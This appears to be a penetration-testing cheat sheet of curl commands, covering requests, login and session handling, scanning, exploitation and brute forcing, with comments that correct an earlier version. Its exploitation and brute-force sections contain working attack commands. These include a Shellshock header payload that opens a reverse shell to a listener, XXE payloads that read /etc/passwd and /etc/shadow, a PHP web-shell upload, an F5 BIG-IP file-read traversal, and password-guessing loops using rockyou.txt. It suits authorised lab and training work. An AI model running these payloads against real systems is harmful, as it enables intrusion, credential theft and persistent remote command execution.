In many scenarios you will not have GUI access to the web application under test, but curl is almost always installed on the test machine, so below is a simple cheat sheet for running basic checks with it.
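#Get request using Curl (-i keeps the response headers in the output; -I alone sends a HEAD request, see below)
curl -i http://10.10.10.10
# Send Post Request (the original had "&param2" mangled into a pilcrow; the separator is a plain ampersand)
curl --data "param1=value1&param2=value2" http://10.10.10.10
#Check for Trace Method (only a finding if the body echoes your request back, including headers/cookies)
curl -k -v -X TRACE http://10.10.10.10
#PUT Request
curl -X PUT -d "PUT request data" http://10.10.10.10
curl -kL https://10.10.10.10 -T file.txt
#HEAD Request
curl -I http://10.10.10.10
#Test DEBUG Method --> if Response "OK" --> DEBUG is enabled
curl -X DEBUG https://10.10.10.10 -k -v -H "Command: stop-debug"
#Ignore SSL warnings (-k skips certificate verification; it only has an effect on https:// URLs)
curl -k https://10.10.10.10
#Follow Redirection
curl -L http://10.10.10.10
#Add headers in a JSON GET request
curl -i -H "Accept: application/json" -H "Content-Type: application/json" http://10.10.10.10
#Add headers in a request XML GET request
curl -H "Accept: application/xml" -H "Content-Type: application/xml" -X GET http://10.10.10.10
#XML POST request
curl -k -X POST -H "Content-Type: application/xml" -H "Accept: application/xml" -d "<Request><Login>my_login</Login><Password>my_password</Password></Request>" https://10.10.10.10
#File Upload
# -d @file strips carriage returns/newlines from the file and sends it as application/x-www-form-urlencoded;
# use --data-binary for the raw file as the request body, or -F for a multipart/form-data upload
curl -X POST --data-binary @filename http://10.10.10.10
curl -X POST -F "file=@filename" http://10.10.10.10
#Proxy Testing
curl -kL https://google.com --proxy http://10.10.10.10:443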
Login and Session Management using CURL
#GET request Login using Curl
# Both spellings send the same "Authorization: Basic" header on the first request.
# The credentials are visible in `ps` and shell history; "-u user" with no password makes curl prompt for it instead.
curl --user 'user:pass' http://10.10.10.10
curl -u 'user:pass' http://10.10.10.10
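#JSON POST Request Login
# Fixed: the original had "--d'{...}'" (no such option and no space) — the body flag is "-d".
# This sends both a JSON body and an "Authorization: Basic" header; drop --user if the endpoint only authenticates via the body.
curl -X POST https://10.10.10.10 -H "Content-Type: application/json" -d '{"login":"my_login","password":"my_password"}' --user "login:password"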
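#Curl POST Request
curl -X POST https://10.10.10.10 -H "Content-Type: application/json" -d '{"productId": 123456, "quantity": 100}'
# Form-encoded body; "&" separates the parameters (the original had it mangled into a pilcrow, "¶m2")
curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "param1=value1&param2=value2" https://10.10.10.10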
#Save the session as cookie
# -c is --cookie-jar: every Set-Cookie the server returns is written to the file in clear text,
# so the jar holds the live session token — treat it like a credential and remove it afterwards.
curl -u 'user:pass' -c ./somefile https://10.10.10.10
#Login using the saved session
# -b is --cookie: replays the saved cookies, so no username/password is needed this time.
curl -b ./somefile https://10.10.10.10
#Login with Authorization: Basic
# --basic sends the base64 credentials in the very first request (no challenge round-trip); -v shows the header.
curl -v --basic --user 'root:root' http://10.10.10.10/console
#Login with Digest Authorization
# --digest first sends an unauthenticated request, then answers the server's 401 challenge with a hash
# instead of the clear-text password; -v shows both exchanges.
curl --digest --user 'admin:admin' -v http://10.10.10.10/console
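#Upload a file using PUT method
# Fixed: the original used typographic quotes (“cmd”) which PHP does not parse; plain double quotes inside the
# single-quoted shell string are correct. --data-binary sends the payload byte-for-byte.
# A 201/204 only proves the PUT was stored — confirm execution with a GET to /test/shell.php?cmd=id.
# This leaves an unauthenticated command shell on the target: record it and remove it at the end of the engagement.
curl -v -X PUT --data-binary '<?php system($_GET["cmd"]); ?>' http://10.10.10.10/test/shell.php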
Information Gathering using CURL
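#Iterate a number from 1 to 20 in the given Variable and check the difference
# Brace expansion instead of seq; printf instead of "echo -n" (portable). When a page has no <title>
# the original left the "N: " prefix dangling on the same line as the next result, so print a marker instead.
for i in {1..20}; do
  printf '%s: ' "$i"
  curl -s "http://10.10.10.10/index.php/jobs/apply/$i/" | grep '<title>' || echo "(no title)"
done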
#Get all the links from a page
# -sL: silent, follow redirects. Keep lines containing "title" or "href" and strip their leading whitespace.
curl -sL 10.11.1.71 | grep -e 'title' -e 'href' | sed 's/^[[:space:]]*//'
#get Text in much better readable Format
# Render the HTML to 99-column plain text and collapse adjacent duplicate lines.
curl -sL 10.11.1.71 | html2text -width 99 | uniq
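#Finding Basic Authorization Hosts 100.64.0.0-100.127.255.255
# The original matched any "Unauthorized" in curl's verbose output, which also lists Digest/Bearer/NTLM hosts.
# This checks the WWW-Authenticate challenge itself: -D - writes the response headers to stdout, -o /dev/null
# discards the body, and grep -q looks for a Basic challenge. Output format is unchanged (host, or host:8080).
# Note: {1..255} never tests .0 octets, and 255*255*64 hosts x 2 ports is roughly 8 million requests at
# -j250 — make sure the range is in scope and the network can take it.
parallel -j250 '
  host="100.{3}.{1}.{2}"
  if timeout 3 curl -s -o /dev/null -D - "http://$host:80/" 2>/dev/null | grep -qi "^WWW-Authenticate: *Basic"; then echo "$host"; fi
  if timeout 3 curl -s -o /dev/null -D - "http://$host:8080/" 2>/dev/null | grep -qi "^WWW-Authenticate: *Basic"; then echo "$host:8080"; fi
' ::: {1..255} ::: {1..255} ::: {64..127} > auth_basic.txt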
Exploitation
#Exploiting ShellShock using CURL
# The header value is the trigger: an empty function definition "() { :; };" followed by commands that a
# vulnerable bash runs while importing the environment the CGI handler builds from the request headers.
# The two echos end the CGI headers; the rest is a reverse shell to 10.10.10.10:9001, so have a listener
# on that port before sending the request.
curl http://10.10.10.2:80/cgi-bin/user.sh --header "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1 "
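#XXE - When you find /soap or /soap/servlet/rpcrouter Directory
# Fixed: the original URLs had a space after "http://", which curl would reject.
soap='http://10.10.10.10:8080/soap/servlet/rpcrouter'
# External entity pointing at a local file; the <faultactor> element suggests the expanded value is reflected
# in the SOAP fault response — confirm with /etc/passwd before trying anything more sensitive.
curl -kL -X POST -H 'Content-Type: text/xml' "$soap" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <faultactor>&xxe;</faultactor>'
curl -kL -X POST -H 'Content-Type: text/xml' "$soap" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]> <faultactor>&xxe;</faultactor>'
# Out-of-band / SSRF variant: the parser fetches the URL itself. Point it at a host you control (or an
# internal address) so you can observe the callback instead of a third-party site.
curl -kL -X POST -H 'Content-Type: text/xml' "$soap" -d '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY test SYSTEM "https://mail.google.com"> ]> <faultactor>&test;</faultactor>'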
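#LFI on Apache httpd (F5 BIG-IP load balancer)
# The "/..;/" segment is the traversal and must reach the server verbatim: --path-as-is stops curl from
# squashing dot segments in the path (harmless here, required if you vary the traversal). --ciphers is
# spelled in full (the original "--cipher" relied on abbreviation); same workaround as the OpenSSL Errors section.
# Change fileName to read other files once /etc/passwd confirms the read.
curl -kL --path-as-is --ciphers 'DEFAULT:!DH' 'https://10.10.10.10/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'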
Brute forcing using Curl
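#One Liner
# The original word-split the wordlist (passwords with spaces never get tried), printed every response
# body, and backgrounded only the echo. This reads line by line, prints "<password> <http_code>" and
# filters out the 401s, so whatever is left is a hit (or a connection error, code 000).
# Expect account lockout / rate limiting on anything but a lab target.
while IFS= read -r pass; do printf '%s ' "$pass"; curl -sk -o /dev/null -w '%{http_code}\n' -u root:"$pass" https://10.10.10.10; done < /usr/share/wordlists/rockyou.txt | grep -v ' 401$'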
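#Better for readability
# Changes from the original: the wordlist is read line by line (for/$(cat) word-splits passwords containing
# spaces); "break 2" in a single loop is replaced by a plain break; and a 000 code (curl could not complete
# the request: refused, timeout, TLS failure) is no longer reported as a cracked password, since the
# original treated every non-401 as success.
# The password is passed on argv and is visible in `ps`; acceptable on a test box, not on a shared host.
target='https://10.10.10.10'
while IFS= read -r pass || [[ -n "$pass" ]]; do
  http_code=$(curl -s -k --digest -u admin:"$pass" -o /dev/null -w '%{http_code}' "$target")
  case "$http_code" in
    401)
      printf "Wrong Password: '%s' --- '%s'\n" "$pass" "$http_code"
      ;;
    000)
      # transport-level failure, not an authentication result — warn and keep going
      printf "Request failed for '%s' (no HTTP response)\n" "$pass" >&2
      ;;
    *)
      printf 'Password Cracked %s (HTTP %s)\n' "$pass" "$http_code"
      break
      ;;
  esac
done < /usr/share/wordlists/rockyou.txt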
OpenSSL Errors
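#Resolving SSL routines::dh key too small
# OpenSSL aborts the handshake when the server offers a DH group smaller than the library's configured
# minimum. Excluding the DH(E) suites from the offer makes the server pick ECDHE or RSA key exchange instead.
# The cipher string syntax is OpenSSL-specific, so this only works when curl is built against OpenSSL
# (check `curl --version`). The weak DH group on the server is itself a finding worth reporting.
# The option is spelled --ciphers in full; the original "--cipher" relied on abbreviation matching.
curl -kL --ciphers 'DEFAULT:!DH' https://10.10.10.10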